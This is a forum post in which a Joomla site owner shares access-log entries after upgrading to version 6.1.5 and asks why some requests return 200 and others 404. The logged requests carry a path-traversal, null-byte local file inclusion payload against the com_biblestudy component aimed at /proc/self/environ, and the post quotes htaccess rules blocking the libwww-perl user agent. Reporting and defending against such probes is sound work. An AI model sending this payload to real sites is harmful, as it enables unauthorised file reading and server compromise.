I've started seeing these entries in my access lo
gs again since upgrading to 6.1.5
Is there something to be concerned about?
83.222.124.106 - - [08/Jul/2010:11:18:23 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.810"
77.221.130.18 - - [08/Jul/2010:11:18:50 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.813"
77.221.130.18 - - [08/Jul/2010:11:18:50 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.813"
77.221.130.18 - - [08/Jul/2010:11:18:52 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.813"
69.63.178.249 - - [08/Jul/2010:11:21:54 -0600] "GET /index.php?option=com_bca-rss-syndicator&feed_id=2 HTTP/1.1" 200 3020 "-" "FacebookFeedParser/1.0 (UniversalFeedParser/4.1;) +facebook.com/"
83.222.124.106 - - [08/Jul/2010:11:22:10 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.810"
83.222.124.106 - - [08/Jul/2010:11:22:09 -0600] "GET /?option=com_bible...mid=72&fontstyle=f-larger//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2043 "-" "libwww-perl/5.810"
77.221.130.18 - - [08/Jul/2010:11:29:20 -0600] "GET /?option=com_bible...mid=72&fontstyle=f-larger//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2043 "-" "libwww-perl/5.813"
77.221.130.18 - - [08/Jul/2010:11:29:21 -0600] "GET /?option=com_bible...mid=72&fontstyle=f-larger//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2043 "-" "libwww-perl/5.813"
77.221.130.18 - - [08/Jul/2010:11:29:20 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.813"
77.221.130.18 - - [08/Jul/2010:11:29:21 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.813"
77.221.130.18 - - [08/Jul/2010:11:30:11 -0600] "GET //index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 53518 "-" "libwww-perl/5.813"
77.221.130.18 - - [08/Jul/2010:11:30:10 -0600] "GET /?option=com_bible...mid=72&fontstyle=f-larger//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 2043 "-" "libwww-perl/5.813"
I've got the following in my htaccess file
RewriteCond %{HTTP_USER_AGENT} ^.*libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC, OR]
Real question is why are some returning 404's and others return 200?